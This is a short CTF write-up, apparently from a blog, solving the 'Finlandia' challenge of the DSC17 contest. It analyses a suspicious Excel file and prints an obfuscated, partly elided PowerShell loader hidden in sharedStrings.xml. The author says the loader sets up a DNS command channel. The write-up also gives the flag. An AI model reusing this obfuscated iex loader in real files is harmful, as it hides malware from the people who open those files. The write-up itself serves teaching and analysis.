Hi mates,
During my spare time i have tried some tasks from DSC17 CTF by S21sec. I will comment here on those in which I found more difficult or fun. FBCTF was present as platform so from here tasks names will be countries associated.
Finlandia – 400 points
I have an Excel suspicious file as title says and first thing is uncompress or extract contents. So use binwalk, rename as zip or whatever. Inside we have a vba bin file. We can use oledump.py to view its contents.
After some time trying to decompress and decode vba bin file , seems no exit so i ‘ve start to search for other files. I have see one in particular. sharedStrings.xml :
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>('83G116G97B114E1...[]...C112B116B98B108C111H99H107C32G123H1'.SplIt('BHECG')|%{([Char][Int]$_)} )-Join''|iex|out-null</t></si></sst>
So, this is powershell obfuscated code, let’s try to see it’s contents.
It creates a DNS client to pass commands on powershell. Flag is «f25a2fc72690b780b2a14e140ef6a9e0»
![S21SEC [DCS17CTF] – Mauritania](https://i0.wp.com/blogs.tunelko.com/wp-content/uploads/2017/05/score.jpg?fit=75%2C37&ssl=1){kind=small}